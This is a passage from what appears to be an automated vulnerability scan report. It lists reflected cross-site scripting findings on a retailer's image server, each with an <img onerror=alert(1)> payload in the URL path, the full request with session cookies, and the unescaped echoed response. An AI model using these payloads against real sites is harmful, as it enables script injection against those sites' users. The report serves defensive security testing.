Unable to find /pacsun/detailLogo_2423981c<img src=a onerror=alert(1)>f3c6a27bcdf

3.55. http://images3.pacsun.com/is/image/pacsun/detailLogo_261 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_261

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2bd47<img%20src%3da%20onerror%3dalert(1)>32ef2fcb48c was submitted in the REST URL parameter 4. This input was echoed as 2bd47<img src=a onerror=alert(1)>32ef2fcb48c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_2612bd47<img%20src%3da%20onerror%3dalert(1)>32ef2fcb48c?$img_gif$&hei=20&wid=82&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:27 GMT
Connection: close

Unable to find /pacsun/detailLogo_2612bd47<img src=a onerror=alert(1)>32ef2fcb48c

3.56. http://images3.pacsun.com/is/image/pacsun/detailLogo_291 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_291

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1bec2<img%20src%3da%20onerror%3dalert(1)>800c3098bb6 was submitted in the REST URL parameter 4. This input was echoed as 1bec2<img src=a onerror=alert(1)>800c3098bb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_2911bec2<img%20src%3da%20onerror%3dalert(1)>800c3098bb6?$img_gif$&hei=20&wid=48&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:43 GMT
Connection: close

Unable to find /pacsun/detailLogo_2911bec2<img src=a onerror=alert(1)>800c3098bb6

3.57. http://images3.pacsun.com/is/image/pacsun/detailLogo_301 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_301

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bbe2e<img%20src%3da%20onerror%3dalert(1)>4a5863699ef was submitted in the REST URL parameter 4. This input was echoed as bbe2e<img src=a onerror=alert(1)>4a5863699ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_301bbe2e<img%20src%3da%20onerror%3dalert(1)>4a5863699ef?$img_gif$&hei=20&wid=61&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:29 GMT
Connection: close

Unable to find /pacsun/detailLogo_301bbe2e<img src=a onerror=alert(1)>4a5863699ef

3.58. http://images3.pacsun.com/is/image/pacsun/detailLogo_311 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_311

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4d241<img%20src%3da%20onerror%3dalert(1)>f3192c4dd8e was submitted in the REST URL parameter 4. This input was echoed as 4d241<img src=a onerror=alert(1)>f3192c4dd8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_3114d241<img%20src%3da%20onerror%3dalert(1)>f3192c4dd8e?$img_gif$&hei=20&wid=45&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:25 GMT
Connection: close

Unable to find /pacsun/detailLogo_3114d241<img src=a onerror=alert(1)>f3192c4dd8e

3.59. http://images3.pacsun.com/is/image/pacsun/detailLogo_321 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_321

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7708a<img%20src%3da%20onerror%3dalert(1)>cea37b0dc27 was submitted in the REST URL parameter 4. This input was echoed as 7708a<img src=a onerror=alert(1)>cea37b0dc27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_3217708a<img%20src%3da%20onerror%3dalert(1)>cea37b0dc27?$img_gif$&hei=20&wid=82&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:23 GMT
Connection: close

Unable to find /pacsun/detailLogo_3217708a<img src=a onerror=alert(1)>cea37b0dc27

3.60. http://images3.pacsun.com/is/image/pacsun/detailLogo_331 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_331

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c626d<img%20src%3da%20onerror%3dalert(1)>f8e8550aea6 was submitted in the REST URL parameter 4. This input was echoed as c626d<img src=a onerror=alert(1)>f8e8550aea6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_331c626d<img%20src%3da%20onerror%3dalert(1)>f8e8550aea6?$img_gif$&hei=20&wid=29&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:41 GMT
Connection: close

Unable to find /pacsun/detailLogo_331c626d<img src=a onerror=alert(1)>f8e8550aea6

3.61. http://images3.pacsun.com/is/image/pacsun/detailLogo_341 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_341

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f3612<img%20src%3da%20onerror%3dalert(1)>8e7e91e7892 was submitted in the REST URL parameter 4. This input was echoed as f3612<img src=a onerror=alert(1)>8e7e91e7892 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_341f3612<img%20src%3da%20onerror%3dalert(1)>8e7e91e7892?$img_gif$&hei=20&wid=49&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:36 GMT
Connection: close

Unable to find /pacsun/detailLogo_341f3612<img src=a onerror=alert(1)>8e7e91e7892

3.62. http://images3.pacsun.com/is/image/pacsun/detailLogo_391 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_391

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cec91<img%20src%3da%20onerror%3dalert(1)>fe6601272ff was submitted in the REST URL parameter 4. This input was echoed as cec91<img src=a onerror=alert(1)>fe6601272ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_391cec91<img%20src%3da%20onerror%3dalert(1)>fe6601272ff?$img_gif$&hei=20&wid=33&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:31 GMT
Connection: close

Unable to find /pacsun/detailLogo_391cec91<img src=a onerror=alert(1)>fe6601272ff

3.63. http://images3.pacsun.com/is/image/pacsun/detailLogo_421 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_421

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61b2e<img%20src%3da%20onerror%3dalert(1)>c719197871a was submitted in the REST URL parameter 4. This input was echoed as 61b2e<img src=a onerror=alert(1)>c719197871a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_42161b2e<img%20src%3da%20onerror%3dalert(1)>c719197871a?$img_gif$&hei=20&wid=102&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:33 GMT
Connection: close

Unable to find /pacsun/detailLogo_42161b2e<img src=a onerror=alert(1)>c719197871a

3.64. http://images3.pacsun.com/is/image/pacsun/detailLogo_432 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_432

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fdfd6<img%20src%3da%20onerror%3dalert(1)>5225426e988 was submitted in the REST URL parameter 4. This input was echoed as fdfd6<img src=a onerror=alert(1)>5225426e988 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_432fdfd6<img%20src%3da%20onerror%3dalert(1)>5225426e988?$img_gif$&hei=20&wid=39&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:38 GMT
Connection: close

Unable to find /pacsun/detailLogo_432fdfd6<img src=a onerror=alert(1)>5225426e988

3.65. http://images3.pacsun.com/is/image/pacsun/detailLogo_471 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_471

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c3b86<img%20src%3da%20onerror%3dalert(1)>2f11037b8a8 was submitted in the REST URL parameter 4. This input was echoed as c3b86<img src=a onerror=alert(1)>2f11037b8a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_471c3b86<img%20src%3da%20onerror%3dalert(1)>2f11037b8a8?$img_gif$&hei=20&wid=56&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:24 GMT
Connection: close

Unable to find /pacsun/detailLogo_471c3b86<img src=a onerror=alert(1)>2f11037b8a8

3.66. http://images3.pacsun.com/is/image/pacsun/detailLogo_482 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_482

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 92ad0<img%20src%3da%20onerror%3dalert(1)>67a04e9f9ad was submitted in the REST URL parameter 4. This input was echoed as 92ad0<img src=a onerror=alert(1)>67a04e9f9ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_48292ad0<img%20src%3da%20onerror%3dalert(1)>67a04e9f9ad?$img_gif$&hei=20&wid=14&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:37 GMT
Connection: close

Unable to find /pacsun/detailLogo_48292ad0<img src=a onerror=alert(1)>67a04e9f9ad

3.67. http://images3.pacsun.com/is/image/pacsun/detailLogo_501 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_501

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 25c5c<img%20src%3da%20onerror%3dalert(1)>acdf4b335e7 was submitted in the REST URL parameter 4. This input was echoed as 25c5c<img src=a onerror=alert(1)>acdf4b335e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_50125c5c<img%20src%3da%20onerror%3dalert(1)>acdf4b335e7?$img_gif$&hei=20&wid=93&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:36 GMT
Connection: close

Unable to find /pacsun/detailLogo_50125c5c<img src=a onerror=alert(1)>acdf4b335e7

3.68. http://images3.pacsun.com/is/image/pacsun/detailLogo_541 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_541

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1700a<img%20src%3da%20onerror%3dalert(1)>431cdd919b0 was submitted in the REST URL parameter 4. This input was echoed as 1700a<img src=a onerror=alert(1)>431cdd919b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_5411700a<img%20src%3da%20onerror%3dalert(1)>431cdd919b0?$img_gif$&hei=20&wid=24&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:27 GMT
Connection: close

Unable to find /pacsun/detailLogo_5411700a<img src=a onerror=alert(1)>431cdd919b0

3.69. http://images3.pacsun.com/is/image/pacsun/detailLogo_551 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_551

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ff769<img%20src%3da%20onerror%3dalert(1)>4cee47844e1 was submitted in the REST URL parameter 4. This input was echoed as ff769<img src=a onerror=alert(1)>4cee47844e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_551ff769<img%20src%3da%20onerror%3dalert(1)>4cee47844e1?$img_gif$&hei=20&wid=140&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:27 GMT
Connection: close

Unable to find /pacsun/detailLogo_551ff769<img src=a onerror=alert(1)>4cee47844e1

3.70. http://images3.pacsun.com/is/image/pacsun/detailLogo_581 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_581

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9574c<img%20src%3da%20onerror%3dalert(1)>fefecf03ff0 was submitted in the REST URL parameter 4. This input was echoed as 9574c<img src=a onerror=alert(1)>fefecf03ff0 in the application's response.

